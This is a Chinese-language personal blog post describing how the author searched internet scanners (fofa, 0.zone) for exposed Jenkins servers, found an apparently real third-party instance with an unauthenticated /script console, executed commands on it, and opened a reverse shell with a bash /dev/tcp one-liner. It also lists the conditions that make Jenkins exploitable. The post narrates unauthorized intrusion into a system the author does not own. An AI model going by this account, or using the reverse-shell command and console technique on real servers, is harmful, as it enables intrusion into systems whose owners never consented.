侧边栏壁纸
博主头像

  • 累计撰写 12 篇文章
  • 累计创建 12 个标签
  • 累计收到 1 条评论

目 录CONTENT

文章目录

记一次,随缘找Jenkins未授权漏洞

⠀
2022-06-27 / 0 评论 / 0 点赞 / 128 阅读 / 628 字 / 正在检测是否收录...

搜索Jenkins

fofa

0.zone

最后在0.zone 搜索里面找到的jenkins 未授权

Jenkins介绍

Jenkins是一个基于Java开发的开源项目,可在Tomcat等流行的servlet容器中运行,也可以独立运行,
其功能如下:
用于持续性、自动的构建/测试软件,
项目监控或跑一些定时任务,
监控外部调用执行的工作。

Jenkins 漏洞原因

Jenkins系统后台中可以执行系统脚本命令(本作用是故障排除和诊断使用)。

利用条件

使用低版本的Jenkins,默认没有登录控制
有登录控制,但配置文件中设置了不启用安全性
(/var/lib/jenkins/config.xml 设置为false)
控制台使用了弱密码

开始测试是否存在

这里网站就不贴出来了

登录测试过了,密码改过了 不是admin

然后测试是否存在命令执行
在url后面加个/script 就可以了 ,看是否存在跳转验证

运气不错 ,不存在验证 ,测试一下执行命令
执行命令成功
这里已经存在未授权漏洞了

反弹shell

想测试一下可以存在反弹shell ,嘿嘿

这里使用bash 反弹命令

bash -i >& /dev/tcp/0.0.0.0/2333 0>&1

可以参考这篇文章
https://www.csdn.net/tags/MtzaEgxsMjYwNzQtYmxvZwO0O0OO0O0O.html#Bash_TCP_2

在自己的服务上监听端口
成功反弹shell

这次随缘找洞 ,反弹之后没有做任何操作了,到此结束。

0

评论区